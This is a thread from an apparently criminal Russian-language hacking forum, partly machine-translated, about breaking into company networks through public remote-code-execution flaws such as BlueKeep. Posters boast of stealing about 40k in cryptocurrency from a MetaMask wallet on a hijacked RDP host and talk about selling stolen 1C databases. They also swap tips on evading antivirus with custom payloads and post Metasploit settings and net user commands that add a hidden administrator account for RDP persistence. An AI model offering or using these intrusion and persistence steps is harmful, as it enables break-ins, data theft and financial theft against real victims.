Статья Добываем доступы в корпы через паблик RCE

[yashechka]

Видео по статье Бори снятое Оксигеном очень пользуется у пользователей, и у меня постоянно его просят в личке, поэтому я залил его на канал

 

[dictat0r]

god bless you ! i made 40k tonight with your guide

 

[1MG]

тема интересная но как это связано с корпами? не помню чтобы где то видел RDP вообще, да еще чтобы весь завод сидел на одном сервере - это ключевой момент. кого ломать то, инженера? манагеры нужны, че толку от инженеров

на видосе - база данных типа 1С которая там и крутится, от нее понту? только продать обратно, но сначала слить надо

если кто то увлекается можем вместе попробовать, ломать время не хватит, а СИ это другое дело, сразу всем нужен

god bless you ! i made 40k tonight with your guide

?

 

[fectrorem]

тема интересная но как это связано с корпами? не помню чтобы где то видел RDP вообще, да еще чтобы весь завод сидел на одном сервере - это ключевой момент. кого ломать то, инженера? манагеры нужны, че толку от инженеров

на видосе - база данных типа 1С которая там и крутится, от нее понту? только продать обратно, но сначала слить надо

если кто то увлекается можем вместе попробовать, ломать время не хватит, а СИ это другое дело, сразу всем нужен

?

А связано это так, что ты попадаешь сначала на машину, которая в дальнейшем будет твоим трамплином во внутреннюю сеть компании.

 

[dictat0r]

Interesting topic, but how does this relate to corpses? I don't remember seeing RDP anywhere at all, and even that the whole plant was sitting on one server - this is the key point. someone to break, an engineer? managers are needed, what's the use of engineers

on vidos - a database of type 1C which is spinning there, from her ponto? only sell back, but first you need to drain

if someone is fond of, we can try together, there is not enough time to break, but SI is another matter, everyone needs it right away

?

for me it has nothing to do with corps, i have gathered pos accesses etc.. i look in each rdp and see interesting files and search, spend all day every day for 1 week, last night i got lucky and found metamask on one rdp with 40k in crypto which i easily extracted

 

[yashechka]

for me it has nothing to do with corps, i have gathered pos accesses etc.. i look in each rdp and see interesting files and search, spend all day every day for 1 week, last night i got lucky and found metamask on one rdp with 40k in crypto which i easily extracted

Ты это, давай не хвастайся, делись лучше ))

 

[boriselcin]

Ребята спасибо кто донатил мне за статью, это дает мне надежду что я не пустую х#йню написал

 

[lerato]

Nice job Dictot0r
dont forget about small things u did said ... and u work harder than any us ...
not 99.99% sure it was u, but it was log time ago, something like 50/50 dosent mater who will make, we will share
all good, no pressure, no stress
time to share, give to charity 10 0%

and when u go to say that u dont know me, its ok, ....

 

[Chairman]

Новичкам вроде меня следует подумать об изучении базового обхода антивируса, чтобы получить оболочку и установить постоянство в целевой системе.
Не надейтесь на стандартные полезные нагрузки msfvenom или cobalt strike по умолчанию.
Не загружайте свои образцы в virustotal или другой, просто тестируйте на виртуальной машине с отключением отправки образца вредоносного ПО в облако.
проверьте это тоже с включенным антивирусом.
Это нестандартная полезная нагрузка, я успешно получил оболочку

чем если не секрет ты создаешь payload-ы раз msfvenom или cobalt strike по умолчанию не подходят ?

 

[fectrorem]

чем если не секрет ты создаешь payload-ы раз msfvenom или cobalt strike по умолчанию не подходят ?

подходят, но если на целевой системе стоит нормальный ав, то спалит моментально дефолтный пейлоад

 

[boriselcin]

подходят, но если на целевой системе стоит нормальный ав, то спалит моментально дефолтный пейлоад

с блюкипом это не так)

 

[fectrorem]

Здравствуйте, подскажите, может кто знает, почему в метерпретере появляются адреса, которых нету в файле с айпишниками, что я пытаюсь экплуатировать? Полагаю это связано как то с настройками метасплоита, но интересны ваши мысли на этот счёт

 

[kryptan]

с блюкипом это не так)

как на кобу это все дело сделать ? не могу понгять как заменить пейлоад в мсф на нестандартный

 

[Pent]

как на кобу это все дело сделать ? не могу понгять как заменить пейлоад в мсф на нестандартный

PAYLOAD windows/x64/exec

 

[lerato]

@boriselcin
GROOMe size -100-250? а можно например 159, 221, почему только в 50..,
Разобрался с крошками, да все умерло!
Immunity Canvas, ты спрашивал, не подойдет для масс аттак, только таргет
напиши куда смотреть насчет коба продвижения внутри сети, или других напровлениях, только направление куда двигаться, больше ничего ненадо пока
а так, нормальнo, все работает

 

[Chairman]

подскажите у кого есть опыть , как поднять привилегии с системы до админ. чтоб рдп создать.
"getprivs" и "getsystem" не помагает

 

[National Hazard Agency]

подскажите у кого есть опыть , как поднять привилегии с системы до админ. чтоб рдп создать.
"getprivs" и "getsystem" не помагает

если у тебя привелегии системы то ты уже выше админа вопрос правильно задавай
юзерка => админ => система

 

[Chairman]

ок. задам по другому.
как создать нового пользователя для rdp соединения ?

 

[National Hazard Agency]

ок. задам по другому.
как создать нового пользователя для rdp соединения ?

shell
net user admin1 2a5$7rtR /add
net user admin1 /active:yes
net localgroup Administrators admin1 /add

готово можешь заходить по кредам через 3389 логин - admin1 пароль - 2a5$7rtR
Это при условии что порт 3389 открыт изначально

 

[Chairman]

shell
net user admin1 2a5$7rtR /add
net user admin1 /active:yes
net localgroup Administrators admin1 /add

готово можешь заходить по кредам через 3389 логин - admin1 пароль - 2a5$7rtR
Это при условии что порт 3389 открыт изначально

что то такое пробовал тоже, помню не получалось , но у меня отличия в одной команде

пробовал что то типа

shell
net user admin1 mar3porA /add
net localgroup administrators admin1 /add
net accounts /maxpwage:unlimited
net accounts /forcelogoff:no

пойдут свежие сессии, попробую твой вариант

спасибо